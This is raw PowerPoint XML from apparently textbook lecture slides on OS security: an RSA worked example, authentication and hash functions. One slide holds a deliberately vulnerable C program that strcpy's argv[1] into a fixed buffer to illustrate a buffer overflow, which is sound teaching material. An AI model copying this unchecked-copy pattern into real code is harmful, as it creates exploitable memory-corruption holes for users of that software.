              </a:rPr>
              <a:t>−1)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>−1) = 72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We next select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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sz="2400" i="1" dirty="0"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relatively prime to 72 and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>72, yielding 5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Finally, we calculate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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sz="2400" i="1" dirty="0"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such that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"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mod 72 = 1, yielding 29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We how have our keys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Public key,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e,N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= 5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dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>91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Private key,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d,N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= 29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>91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 Encrypting the message 69 with the public key results in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>cyphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 62</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cyphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> can be decoded with the private key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Public key can be distributed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to anyone who wants to communicate with holder of public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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6030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71438"/>
            <a:ext cx="7956550" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Encryption using RSA Asymmetric Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3789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413" y="1012825"/>
            <a:ext cx="2644775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7421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114300"/>
            <a:ext cx="7975600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Cryptography (Cont.)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725" y="1165225"/>
            <a:ext cx="6672263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Note symmetric cryptography based on transformations, asymmetric based on mathematical functions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Asymmetric much more compute intensive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Typically not used for bulk data encryption </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313019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155575"/>
            <a:ext cx="7662862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C Program with Buffer-overflow Condition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8001000" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&gt;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#define BUFFER SIZE 256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>[])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{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char buffer[BUFFER SIZE];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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2)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	return -1;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else {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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>[1]);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	return 0;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	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic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027495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41288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Authentication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96950"/>
            <a:ext cx="9067800" cy="5221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Constraining set of potential senders of a message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Complementary to encryption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Also can prove message unmodified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Helvetic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Algorithm components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set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of keys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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>of messages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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>of authenticators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S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→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A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S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is a function for generating authenticators from messages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S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S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A function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>: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→ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>× </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>→ {true, false}). That is, for each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dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>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is a function for verifying authenticators on messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V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for any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should be efficiently computable functions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11566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576263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication (Cont.)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4867275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For a message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, a computer can generate an authenticator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>such that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> only if it possesses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Thus, computer holding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> can generate authenticators on messages so that any other computer possessing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> can verify them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Computer not holding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> cannot generate authenticators on messages that can be verified using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V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k</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since authenticators are generally exposed (for example, they are sent on the network with the messages themselves), it must not be feasible to derive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from the authenticators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Practically, if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m,a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>then we know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> has not been modified and that send of message has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k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If we share </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0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 with only one entity, know where the message originated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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188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31888" y="114300"/>
            <a:ext cx="7869237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Authentication – Hash Functions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09600"/>
            <a:ext cx="9067800" cy="5081587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Basis of authentication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Creates small, fixed-size block of data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message digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 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hash value)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from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endParaRPr lang="en-US" sz="800" i="1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Hash Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>must be collision resistant on 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Must be infeasible to find an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> ≠ 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m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>such that 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H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) = 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H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)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If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> H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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H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ja-JP" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>), then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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The message has not been modified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Common message-digest functions include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MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, which produces a 128-bit hash, and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SHA-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, which outputs a 160-bit hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"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Not useful as authenticators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For example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>H(m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
